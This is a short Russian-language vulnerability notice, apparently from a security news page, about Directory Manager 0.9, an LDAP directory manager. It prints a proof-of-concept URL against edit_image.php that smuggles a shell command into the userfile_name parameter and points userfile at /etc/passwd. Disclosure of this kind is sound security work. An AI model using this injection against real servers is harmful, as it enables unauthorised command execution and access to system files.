Directory Manager — «фишка», которая руководит данными каталога LDAP. В его составе: независимый редактор, утилита для просмотра схем и некоторые виды данных. Уязвимость защиты в программе позволяет выполнить произвольную команду.

Уязвимость работает на Directory Manager версии 0.9

http://victim.host/edit_image.php?dn=1& userfile=/etc/passwd&userfile_name=%20;ls;%20

Оставить мнение